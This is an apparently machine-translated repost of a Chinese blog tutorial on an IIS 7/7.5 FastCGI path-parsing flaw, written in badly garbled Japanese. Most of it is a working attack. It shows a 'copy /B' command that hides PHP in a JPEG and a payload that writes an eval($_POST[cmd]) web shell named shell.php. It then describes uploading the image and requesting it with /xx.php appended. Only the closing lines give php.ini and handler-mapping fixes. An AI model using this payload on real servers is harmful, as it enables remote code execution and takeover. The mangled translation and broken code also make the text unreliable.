/xx.php /xx.jpg/xx.php続くファイルパス(/xx.jpg)でIIS7 /動作の高速CGIモードで7.5、PHP用のファイルを解析します。
この方法で使用される:頭と尾のマップとテキストファイル書かれたバックドアコード書かれたテキストは、悪質なバイナリイメージをマージした後、画像ファイルの回避ダメージを
例えばコピーxx.jpg / B + yy.txt / xy.jpg
######################################
/ B即ちバイナリ[バイナリ]モード
アスキーxx.jpg通常の画像ファイルである/ Aモード
yy.txt内容<?PHPfputs(のfopen( 'shell.php'、) 'W'、 '?<?phpのevalの($ _ POST [CMD])>');?>
コンテンツを書くことを意味<?PHPのevalの($ _ POST [CMD])?>は、ファイルshell.phpの名前です
######################################
Xy.jpgは、悪意のないテキストを実行するためのアドレスプラス/xx.php後、アップロードした後、xy.jpgアドレスを見つけるための場所を見つけます。
そして、画像ディレクトリ内の単語トロイの木馬shell.phpパスワードcmdを生成
注意:
二つの条件を解決するためのニーズを活用します:
cgi.fix_pathinfo 1. php.iniの= 1(デフォルト1)
2.次のことを確認し、「ハンドラーマッピング」でキャンセル:
ソリューション:
1.設定cgi.pathinfo(php.iniの)0で、プログラムのphp-cgiのを再起動します
「ハンドラーマッピング」チェックのphp-cgi.exeがプログラム2.「呼び出しハンドラ要求がマップされている場合にのみ」
3.再設定は、使用ISAPIの道(:PHP5.3.1もはやサポートISAPIモードノート)、IIS。
オリジナルリンクします。https://blog.csdn.net/sap910131/article/details/37379177